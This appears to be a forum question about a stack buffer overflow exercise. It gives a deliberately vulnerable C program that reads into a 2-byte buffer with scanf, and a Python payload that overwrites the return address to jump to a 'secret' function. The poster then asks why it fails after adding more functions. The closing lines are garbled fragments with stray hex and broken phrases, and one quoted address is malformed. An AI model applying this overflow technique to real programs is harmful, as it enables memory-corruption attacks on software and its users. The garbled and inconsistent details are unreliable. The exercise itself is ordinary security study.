For educational purposes, I'm trying to execute bufferoverflow, which directs the program to a different address.
This is a c-program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void secret1(void) {
puts("You found the secret function No. 1!\n");
}
int main () {
char string[2];
puts("Input: ");
scanf("%s", string);
printf("You entered %s.\n", string);
return 0;
}
I used gdb to find the address of secret1, as well as the offset of my string variable in RIP. Using this information, I created the following python-exploit:
import struct
rip = 0x0000000100000e40
print("A"*24 + struct.pack("<q", rip))
Until now, everything works - the program jumps to secret1, and then crashes with "Segmentation Error".
HOWEVER, if I extend my program as follows:
...
void secret1(void) {
puts("You found the secret function No. 1!\n");
}
void secret2(void) {
puts("You found the secret function No. 2!\n");
}
void secret3(void) {
puts("You found the secret function No. 3!\n");
}
...
... these are SegFaults WITHOUT switching to any of the functions, even if the new fake RIPs are correct (i.e. 0x0000000100000d6c for secret1, 0x0000000101000000d7e for secret2). The offset remains the same as gdb told me (or not?).
, , " ", , 0x100000 d.. - ββ tho, - 0x100000 e..
32- ( ), 64- .
-fno-stack-protector
- ? !